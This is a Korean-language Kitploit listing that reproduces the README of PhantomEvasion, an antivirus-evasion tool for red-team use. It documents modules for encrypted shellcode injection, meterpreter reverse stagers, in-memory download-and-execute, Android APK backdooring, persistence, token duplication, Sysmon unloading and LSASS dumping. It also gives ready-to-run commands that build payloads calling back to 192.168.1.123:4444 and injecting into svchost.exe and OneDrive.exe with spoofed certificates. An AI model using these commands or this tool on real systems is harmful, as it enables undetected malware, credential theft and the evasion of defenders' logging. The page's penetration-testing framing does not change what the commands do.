Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
PhantomEvasion — Python 기반의 안티바이러스 우회 도구로, msfvenom 페이로드로부터 탐지되지 않는 실행 파일을 생성하며, 정크 코드 삽입, 암호화, 인증서 스푸핑 및 여러 실행 방식과 같은 고급 기술을 사용합니다. | Kitploit
도구/GitHubGitHub/esskumar/phantomevasion
Privilege EscalationExploit FrameworksPayload GenerationPersistence MechanismsShellcodePost-ExploitationPenetration TestingRed Teaming
GitHubesskumar/phantomevasion

PhantomEvasion

Python 기반의 안티바이러스 우회 도구로, msfvenom 페이로드로부터 탐지되지 않는 실행 파일을 생성하며, 정크 코드 삽입, 암호화, 인증서 스푸핑 및 여러 실행 방식과 같은 고급 기술을 사용합니다.

저장소 보기
1716년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

팬텀 에베이전 3.0

Phantom-Evasion은 파이썬(파이썬 및 파이썬3 모두 호환)으로 작성된 안티바이러스 우회 도구로, 가장 일반적인 x86 msfvenom 페이로드로도 (거의) 완전히 탐지되지 않는 실행 파일을 생성할 수 있습니다.

다음 운영체제는 공식적으로 자동 설정을 지원합니다:

  1. Kali Linux
  2. Parrot Security

다음 운영체제는 자동 설정을 지원할 가능성이 높지만 metasploit-framework의 수동 설치가 필요합니다:

  1. OSX (Catalina에서 테스트됨)
  2. Ubuntu
  3. Linux Mint
  4. Elementary
  5. Deepin
  6. 기타 데비안 배포판
  7. CentOS
  8. Fedora
  9. Blackarch

다음 운영체제는 수동 설정이 필요합니다:

  1. Windows 10

Phantom-Evasion 폴더를 git clone하거나 다운로드 및 압축 해제하기만 하면 됩니다.

설정:

자동 설정: 터미널을 열고 다음을 실행하세요:

root@kitploit:~
python3 phantom-evasion.py --setup

또는:

root@kitploit:~
chmod +x ./phantom-evasion.py

./phantom-evasion.py --setup

또는 phantom-evasion을 대화형 모드로 시작하고 옵션 7을 선택하세요.

종속성 (수동 설정만 해당)

  1. metasploit-framework
  2. mingw-w64 (윈도우에서 cygwin)
  3. gcc-multilib
  4. apktool
  5. apksigner
  6. strip
  7. osslsigncode

명령줄/대화형 모드:

  1. phantom-evasion을 대화형 모드로 실행:
root@kitploit:~
python3 phantom-evasion.py

또는:

root@kitploit:~
./phantom-evasion.py
  1. 그렇지 않으면 명령줄 모드 옵션을 보려면:
root@kitploit:~
python3 phantom-evasion.py --help

또는:

root@kitploit:~
./phantom-evasion.py --help

WINDOWS 모듈

-모든 윈도우 페이로드 C 모듈은 EXE 또는 DLL/ReflectiveDLL로 컴파일될 수 있습니다(x86 및 x64 모두 지원).

-무작위 정크코드 주입(강도, 빈도 및 재주입 확률 설정 가능) 및 윈도우 안티바이러스 우회 기술(빈도 설정 가능).

-다중 바이트 XOR/비즈네르 셸코드/파일 암호화는 셸코드 주입 및 다운로드 실행 모듈 모두에서 지원됩니다.

-Ntdll 언후크API 및 PEB 프로세스 가장 기술 지원.

-다양한 실행 모드 지원(로컬 및 원격 모두).

-다양한 페이로드 메모리 할당 모드(Virtual_RWX, Virtual_RW/RX, Virtual_RW/RWX, Heap_RWX) 지원.

-Windows API의 동적 로딩 설정 가능.

-인증서 스푸퍼 및 서명자 지원.

-스트립 실행 파일 (https://en.wikipedia.org/wiki/Strip_(Unix))

Windows C 셸코드 주입

Msfvenom 윈도우 페이로드 및 사용자 정의 셸코드 지원. 셸코드는 리소스로 저장되고 런타임에 FindResource API로 검색될 수 있습니다.

셸코드 암호화 지원:

root@kitploit:~
1.none

2.Multibyte-Xor

3.Double-key Multibyte-Xor

4.Vigenere

5.Double-key Vigenere
  1. 로컬 실행 방식은 다음 중 하나일 수 있습니다:

    Thread

    APC

    로컬 메모리 할당 모드는 다음 중 하나일 수 있습니다:

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

    Heap_RWX

  2. 원격 실행 방식은 다음 중 하나일 수 있습니다:

    ThreadExecutionHijack (약칭 TEH)

    Processinject (약칭 PI)

    APCSpray (약칭 APCS)

    EarlyBird (약칭 EB)

    EntryPointHijack (약칭 EPH)

    원격 메모리 할당 모드는 다음 중 하나일 수 있습니다:

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

Windows 순수 C meterpreter 스테이저 (C)

순수 C meterpreter 스테이저(TCP/HTTP/HTTPS) 모듈은 msfconsole 및 cobalt strike beacon과 호환됩니다. (reverse_tcp/reverse_http/reverse_https)

명령줄 모드 사용:

root@kitploit:~
reverse_tcp c stager is WRT

reverse_http c stager is WRH

reverse_https c stager is WRS
  1. 로컬 실행 방식은 다음 중 하나일 수 있습니다:

    Thread

    APC

    로컬 메모리 할당 모드는 다음 중 하나일 수 있습니다:

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

    Heap_RWX

Windows C 다운로드-실행 NoDiskWrite

제공된 URL에서 메모리로 exe/dll을 다운로드하고 원격 프로세스에 실행/로드합니다(디스크에 쓰지 않음).

EXE/DLL 암호화 다운로드 지원:

root@kitploit:~
1.none
                                 
2.Multibyte-Xor
                                 
3.Double-key Multibyte-Xor
                               
4.Vigenere
                                
5.Double-key Vigenere

암호화된 DLL/EXE는 originalfilename + "crypt" + ".dll" 또는 ".exe"로 저장되며, 이것이 다운로드될 파일입니다.

  1. Windows DownloadExecExe NoDiskWrite (명령줄 모드에서 WDE):

    원격 실행 방식은 다음 중 하나일 수 있습니다:

    ProcessHollowing (약칭 PH)

  2. Windows DownloadExecDll NoDiskWrite (명령줄 모드에서 WDD):

    원격 로딩 방식은 다음 중 하나일 수 있습니다:

    ReflectiveDll (약칭 RD)

    RDAPC (ReflectiveDllAPC)

    ManualMap (약칭 MM) ---> only x86

LINUX 페이로드

Linux 셸코드 주입 모듈 (C)

Msfvenom 리눅스 페이로드 및 사용자 정의 셸코드 지원.

ANDROID 페이로드

  1. Android Msfvenom 난독화 백도어:

    msfvenom 페이로드를 난독화하고 apktool로 재빌드(smali/baksmali)합니다. 난독화된 페이로드는 정상 APK 파일에 백도어를 삽입하는 데 사용될 수 있습니다.

지속성 모듈

  1. Windows 지속성 RegCreateKeyExW 레지스트리 키 추가 (C) 컴파일된 실행 파일을 대상 시스템에 업로드하고, 시작 항목에 추가할 파일의 전체 경로를 인수로 지정하여 실행해야 합니다.

  2. Windows 지속성 REG 레지스트리 키 추가 (CMD) 이 모듈은 지속성 명령줄 페이로드를 생성합니다(REG.exe를 통한 레지스트리 키 추가).

  3. Windows 지속성 프로세스 유지 (C) 컴파일된 실행 파일을 대상 시스템에 업로드하고 실행해야 합니다. CreateToolSnapshot, ProcessFirst 및 ProcessNext를 사용하여 지정된 프로세스가 X초마다 살아 있는지 확인합니다(살아 있지 않으면 WinExec API를 사용하여 새 프로세스를 생성).

  4. Windows 지속성 Schtasks (CMD)

    이 모듈은 지속성 명령줄 페이로드를 생성합니다(Schtasks.exe 사용).

  5. Windows 지속성 서비스 생성 (CMD)

    이 모듈은 지속성 명령줄 페이로드를 생성합니다(sc.exe 사용).

권한 상승 모듈

  1. Windows DuplicateTokenEx (C)

    다른 프로세스에서 복제된 토큰을 사용하여 새 프로세스를 생성합니다. 컴파일된 실행 파일을 대상 시스템에 업로드하고 실행해야 합니다.

사후침투 모듈

  1. Windows Sysmon 언로드 (C) Sysmon 드라이버를 언로드하여 시스템이 Sysmon 이벤트 로그 기록을 중지하게 합니다. 컴파일된 실행 파일을 대상 시스템에 업로드하고 실행해야 합니다.

  2. Windows Sysmon 언로드 (CMD) Sysmon 드라이버를 언로드하여 시스템이 Sysmon 이벤트 로그 기록을 중지하게 합니다.

  3. Windows Attrib 파일 숨기기 (CMD) attrib를 사용하여 파일 숨기기

  4. Windows SetFileAttribute 숨김 (C) SetFileAttribute API를 사용하여 파일 숨기기 컴파일된 실행 파일을 대상 시스템에 업로드하고 실행해야 합니다.

  5. Windows DumpLsass (C) MiniWriteDumpWrite API를 사용하여 Lsass 덤프. 컴파일된 실행 파일을 대상 시스템에 업로드하고 실행해야 합니다.

  6. Windows DumpLsass (CMD)

    명령줄에서 Lsass 덤프.

Phantom-Evasion 명령줄 모드 예제:

  1. 윈도우 셸코드 주입, 스푸핑된 https 인증서로 서명된 exe 출력, 로컬 실행 방식: Thread, 메모리: Virtual_RWX , 암호화: vigenere
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/meterpreter/reverse_tcp -H 192.168.1.123 -P 4444 -i Thread -e 4 -mem Virtual_RWX -j 1 -J 15 -jr 0 -E 5 -c www.windows.com:443 -f exe -o filename.exe
  1. 윈도우 x64 셸코드 주입, reflective dll로 출력, 원격 실행 방식: ProcessInject (PI), 메모리: Virtual_RW/RX , 대상 프로세스: SkypeApp.exe ,암호화: double key xor
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/x64/meterpreter/reverse_tcp -a x64 -H 192.168.1.123 -P 4444 -tp SkypeApp.exe -i PI -e 3 -mem Virtual_RW/RX -j 1 -J 15 -jr 0 -E 5 -f dll -R -o filename.dll
  1. 윈도우 x64 셸코드 주입, stripped dll로 출력, 셸코드가 리소스로 저장됨, 원격 실행 방식: EarlyBird (EB) , 메모리: Virtual_RW/RX , 대상 프로세스: svchost.exe ,암호화: xor
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/x64/meterpreter/reverse_tcp -a x64 -H 192.168.1.123 -P 4444 -tp svchost.exe -i EB -e 2 -mem Virtual_RW/RX -j 1 -J 15 -jr 0 -E 5 -f dll -res -S -o filename.dll
  1. 윈도우 x64 reverse https 스테이저, stripped dll로 출력, 로컬 실행 방식: Thread , 메모리: Heap_RWX
root@kitploit:~
python3 phantom-evasion.py -m WRS -a x64 -H 192.168.1.123 -P 4444 -i Thread -mem Heap_RWX -j 1 -J 15 -jr 0 -E 5 -f dll -S -o filename.dll
  1. 윈도우 x86 downloadexec dll, stripped exe로 출력, 원격 실행 방식: ManualMap (MM), 대상 프로세스: OneDrive.exe ,다운로드 크기 1000000 bytes
root@kitploit:~
python3 phantom-evasion.py -m WDD -U http://192.168.1.123/payload.dll -i MM -tp OneDrive.exe -ds 1000000  -j 10 -J 10 -jr 0 -E 10 -f exe -S -o filename.exe

  1. 윈도우 x64 downloadexec exe, stripped reflective dll로 출력, 원격 실행 방식: ProcessHollowing (PH), 대상 프로세스: svchost.exe ,다운로드 크기 1000000 bytes
root@kitploit:~
python3 phantom-evasion.py -m WDE -U http://192.168.1.123/payloadcrypt.exe -e 4 -ef payload.exe -i PH -tp svchost.exe -ds 1000000  -j 1 -J 5 -jr 0 -E 3 -f dll -R -S -o filename.dll

라이선스

GPLv3.0

크레딧 및 유용한 리소스

https://github.com/stephenfewer/ReflectiveDLLInjection

https://github.com/rsmudge/metasploit-loader

https://ired.team

https://github.com/theevilbit/injection

http://www.rohitab.com/discuss/topic/40761-manual-dll-injection/

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://wikileaks.org/ciav7p1/cms/files/BypassAVDynamics.pdf

도구 다운로드